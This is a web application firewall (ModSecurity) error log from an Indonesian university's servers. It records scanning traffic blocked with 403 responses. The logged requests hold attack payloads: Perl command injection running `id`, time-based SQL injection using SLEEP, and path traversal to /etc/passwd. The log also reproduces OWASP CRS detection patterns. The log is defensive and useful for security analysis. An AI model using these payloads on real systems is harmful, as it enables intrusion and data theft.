[Tue Aug 29 11:43:23.491617 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAe1ee4AAAAB"]
[Tue Aug 29 11:43:25.389213 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13bcCo-f0AAAdftZAAAAAG"]
[Tue Aug 29 11:43:25.425418 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13bcCo-f0AAAd9UQUAAAAr"]
[Tue Aug 29 11:43:27.608966 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13b8Co-f0AAAdTBHcAAAAY"]
[Tue Aug 29 11:43:27.615315 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAARpg74AAAAU"]
[Tue Aug 29 11:43:27.636559 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAARpg78AAAAU"]
[Tue Aug 29 11:43:27.637495 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAAfBLxoAAAAI"]
[Tue Aug 29 11:43:27.656238 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAAfBLxsAAAAI"]
[Tue Aug 29 11:43:27.667106 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAAdTBHoAAAAY"]
[Tue Aug 29 11:43:28.528206 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAe3960AAAAA"]
[Tue Aug 29 11:43:28.553632 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAdTBH8AAAAY"]
[Tue Aug 29 11:43:28.626008 2023] [:error] [pid 1991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAfH1Q4AAAAZ"]
[Tue Aug 29 11:43:28.634538 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAcvBpoAAAAJ"]
[Tue Aug 29 11:43:28.635534 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAdSZUcAAAAX"]
[Tue Aug 29 11:43:29.412550 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAcvBp0AAAAJ"]
[Tue Aug 29 11:43:29.506996 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13ccCo-f0AAAe397oAAAAA"]
[Tue Aug 29 11:43:29.518840 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAfGaX4AAAAT"]
[Tue Aug 29 11:43:29.538323 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAfGaX8AAAAT"]
[Tue Aug 29 11:43:29.545376 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAdTBIkAAAAY"]
[Tue Aug 29 11:43:29.552798 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAfFJ@8AAAAR"]
[Tue Aug 29 11:43:30.421398 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13csCo-f0AAAcvBqAAAAAJ"]
[Tue Aug 29 11:43:30.446792 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13csCo-f0AAAdftZYAAAAG"]
[Tue Aug 29 11:43:30.463720 2023] [:error] [pid 1991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13csCo-f0AAAfH1RYAAAAZ"]
[Tue Aug 29 11:43:31.365101 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13c8Co-f0AAARpg8kAAAAU"]
[Tue Aug 29 11:43:31.383133 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13c8Co-f0AAAfFJ-IAAAAR"]
